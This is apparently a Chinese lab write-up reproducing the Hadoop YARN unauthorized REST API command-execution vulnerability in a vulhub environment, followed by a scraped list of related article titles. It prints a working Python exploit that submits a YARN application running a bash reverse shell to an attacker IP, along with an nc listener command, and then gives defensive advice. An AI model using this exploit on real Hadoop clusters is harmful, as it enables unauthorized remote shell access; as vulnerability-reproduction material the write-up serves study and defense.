漏洞简介以及危害

Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了
Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以通过命令行操作多个目录下
的数据,如进行删除,下载,目录浏览甚至命令行行等操作,产生极大的危害。

环境

vulnhub

测试

启动环境

docker-compose up -d

访问

http://192.168.0.100:8088/cluster

通过REST API命令执行
利用过程:
在本地监听端口 > 创建Application > 调用Submit Application API提交
1.本机监听

nc -lvvp 8888

2.直接本机执行EXP:python exp.py

import requests
target = 'http://192.168.0.100:8088/'
lhost = '192.168.0.105' # put your local host ip here, and listen at port 8888
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {'application-id': app_id,
'application-name': 'get-shell','am-container-spec': {'commands': {'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
},
},
'application-type': 'YARN',
}
requests.post(url, json=data)

3.反弹shell成功

防御手段

  • 如无必要, 关闭 Hadoop Web 管理⻚面。
  • 开启身份验证 ,防止未经授权用户访问。
  • 设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访包括 50070 以及 WebUI 等相关端口。

Hadoop未授权访问漏洞相关推荐

  1. Hadoop未授权访问漏洞记录(影响版本:全版本,端口号:50070)

    漏洞简介以及危害 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器器直接在开放了了 Hadoop 机器器 HDFS 的 50070 web 端口及部分默认服务口口,黑客可以 ...

  2. 漏洞复现 - - - 未授权访问漏洞Redis

    目录 一,未授权访问漏洞概述 二,常见的未授权访问漏洞 Redis历史漏洞 三,Redis未授权访问 漏洞信息 Redis 简介 四,环境搭建 漏洞环境搭建 五,漏洞利用方法 实验环境 方法一 ​编辑 ...

  3. 未授权访问漏洞-Redis未授权访问漏洞

    文章目录 未授权概述 常见未授权访问漏洞 Redis未授权访问 Redis简介 应用场景 Redis 架构 漏洞发现 端口 端口探测 Redis常用命令 Redis历史漏洞 Redis未授权访问 Re ...

  4. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  5. Hadoophbase监控页面未授权访问漏洞处理方案验证过程实现

    Hadoop&hbase监控页面未授权访问漏洞处理方案验证 Hadoop:监控页面授权登录配置步骤: 1 页面弹出框授权 1.1页面弹出框授权配置 1.上传附件的jar包hadoop-http ...

  6. 漏洞检测与防御:Redis未授权访问漏洞复现

    漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置.权限认证.授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库.网站目录等敏感 ...

  7. 【应急类漏洞】————1、未授权访问漏洞总结

    前言 2018年5月,比特币勒索病毒 WannaCry 席卷全球,国内众多机构部门计算机系统瘫痪.根据之前应急响应的案例分析,以及一些安全报告统计,目前大部分的勒索病毒均利用未授权访问等通用漏洞进行植 ...

  8. 常用的30+种未授权访问漏洞汇总

    未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...

  9. 常用的端口及未授权访问漏洞

    ​ 一.介绍 用于快速定位端口,查找开放端口脆弱点,有利于外网渗透 1.1 具体端口 端口号 使用 弱点 21 telnet 22 SSH 28退格漏洞.OpenSSL漏洞 25 SMTP协议 53 ...

最新文章

  1. python 怎样使list 里面的数据相加
  2. 20个经典要诀学好英语
  3. JavaScript定义函数的几种方式
  4. IOS基础:声音调用
  5. 笔记-组织级项目管理与大型项目管理-大型及复杂项目
  6. python分片操作_【python原理解析】python中分片的实现原理及使用技巧
  7. 理解水平扩展和垂直扩展
  8. oracle对查询结果求和_Oracle 闪回技术详解
  9. android源码解析------Media多媒体framework层分析
  10. vip forum.php,DZ论坛突破VIP回复查看内容
  11. SHA256算法可逆吗,SHA256算法流程步骤
  12. CefSharp 实现拖拉滑动验证Demo
  13. 遇见心想事成的自己……
  14. URAL 1742 Team building 强联通
  15. 北京市金融工作局:大数据重塑未来金融监管方式
  16. 五阶魔方公式java_五阶魔方花样有多漂亮,关键是有点难
  17. python协同过滤可以预测吗_基于用户的协同过滤推荐算法原理-附python代码实现...
  18. Java 仿 Excel 公式计算
  19. 211毕业生3天被辞退:offer不等于工作稳了!
  20. PCL中利用KD-Tree搜索空间点云最临近点源码

热门文章

  1. Ubuntu history命令 查看 terminal 曾经执行过的命令
  2. 基金从业考试能用计算机吗,【基金从业资格考试机考注意事项】- 环球网校
  3. 《数据挖掘(完整版)》笔记——基于规则的分类器
  4. harmonyos系统支持哪些手机,华为发布了适用于部分手机的HarmonyOS 2.0 beta
  5. 东北大学计算机组成原理实验四,东北大学计算机组成原理实验报告(12页)-原创力文档...
  6. SpringBoot项目报错解决:“Error starting ApplicationContext. To display the conditions report re-run ...”
  7. OurPHP傲派(企业 商城 小程序)建站系统 v2.1.0 bulid20200628
  8. 【iOS】简单的界面制作
  9. [RK3288][Android6.0] WiFi之NetworkAgent对评分的更新
  10. 可扩展性对英特尔®至强处理器意味着什么